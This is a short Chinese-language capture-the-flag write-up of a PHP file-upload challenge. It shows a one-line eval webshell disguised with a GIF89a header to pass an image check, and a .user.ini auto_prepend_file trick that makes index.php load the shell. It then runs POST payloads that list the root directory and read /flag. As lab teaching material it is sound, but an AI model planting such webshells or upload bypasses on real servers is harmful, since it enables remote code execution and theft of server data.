如图,应该是一个文件上传的题目;
1.上传一句话木马:
上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤
改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤
2.改文件头GIF89a?<script language="php">@eval($_POST[dd]);</script>
上传后提示
能够看到文件上传的路径,和文件所在位置里面的其他文件信息,除了上传文件,还有一个index.php文件,
但是到这一步,虽然上传成功的,但是上传的是Jpg文件,静态文件无法通过浏览器进行传参
3..user.ini文件 .user.ini文件构成的PHP后门 - phith0n
.user.ini是php.ini文件的一种,是一个配置文件,这个配置文件的漏洞在于能够通过更改配置项,进而执行程序,php.ini中的一个配置项auto_prepend_file相当于require()函数,能够执行函数里面的php文件 ,这种配置文件的作用在于执行php文件时,会默认的先扫描该文件所在目录下的ini文件,
也就是将user.ini文件传到index.php所在的文件目录,然后甚至user.ini的配置项auto_prepend_file=oneq.jpg
上传.user.ini文件
提示:exif_imagetype:not image!
忘了加文件头了
GIF89a?auto_prepend_file=oneq.jpg
上传成功
4.上传的时候已经运行了index.php,也就是现在可以通过传参进行获取
用蚁剑链接前,先看看基础路径有没有,令dd=var_dump(scandir("/"));(扫描根目录文件)
dd=var_dump(file_get_contents("/flag"));(打印flag内容)